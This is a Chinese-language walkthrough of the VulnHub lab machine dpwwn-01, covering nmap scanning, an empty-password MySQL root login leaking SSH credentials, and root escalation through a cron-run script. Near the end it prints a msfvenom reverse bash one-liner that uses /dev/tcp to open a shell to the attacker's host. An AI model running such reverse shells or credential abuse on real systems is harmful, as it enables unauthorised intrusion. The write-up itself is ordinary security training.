vulnhub靶机-dpwwn-01

vulnhub靶机-dpwwn-01
知识点:

mysql弱口令
利用root权限定时文件提权

环境准备

靶机下载

下载靶机后解压,打开vmx文件即可,网卡设置为net模式

描述

该boot2root是基于Linux的虚拟机,并已使用VMware工作站14进行了测试。

VM的网络接口将从DHCP(网络模式:NAT)获取IP设置。

目标:获得root特权,并在/ root目录下获取dpwwn-01-FLAG.txt的内容。

注意:已在VMware工作站14上测试。

难度:对初学者来说容易/有帮助。

信息收集

主机发现

1
2
arp-scan -l
nmap -sP 192.168.211.1/24

1591147173930

得到靶机ip为192.168.211.147
端口扫描
nmap -A 192.168.211.147 -p 1-65535
1591147517943

开放了一个22端口、80端口、3306端口

getshell

访问80端口,发现只是一个测试页面,扫描目录页没有太多发现,只发现了一个phpinfo页面

之后尝试从3306端口访问

mysql -h 192.168.211.147 -u root -p

不知道密码,直接回车发现没有密码

1591147976008

之后再ssh库中的users表发现了一个ssh账号密码
1591148057680

使用ssh登陆

ssh mistic@192.168.211.147

输入密码即登陆成功
1591148215902

提权

之后再/home/mistic目录下发现一个logrot.sh文件
猜想是否可以通过该文件来进行提取,首先这个文件需要被root用户所执行
查看定时任务

1
cat /etc/crontab

1591148752308

发现该文件会被root用户所执行,满足条件,之后考虑用该文件反弹shell,使用msfvenom在kali里面生成payload:

1
2
3
msfvenom -p cmd/unix/reverse_bash lhost=192.168.211.151 lport=7777

===》0<&168-;exec 168<>/dev/tcp/192.168.211.151/7777;sh <&168 >&168 2>&168

1591149024924

1591149162184

之后使用nc监听,执行脚本后即可获得root权限
1591149308631

文章作者:CyzCc
最后更新:2020年07月06日 16:07:52
原始链接:https://cyzcc.vip/2020/07/06/dpwwn-01/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------